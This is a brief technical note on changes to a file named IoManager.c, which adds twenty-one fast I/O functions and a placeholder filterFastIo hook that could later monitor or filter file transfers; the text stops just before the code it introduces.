IoManager.c


The file IoManager.c has been modified to support fast I/O. Twenty-one fast I/O functions have been implemented. Of the 21 fast I/O functions, 19 call filterFastIo to allow all fast I/O to be monitored. Though this implementation of filterFastIo does nothing, it could easily be modified to monitor or filter fast I/O file transfers:
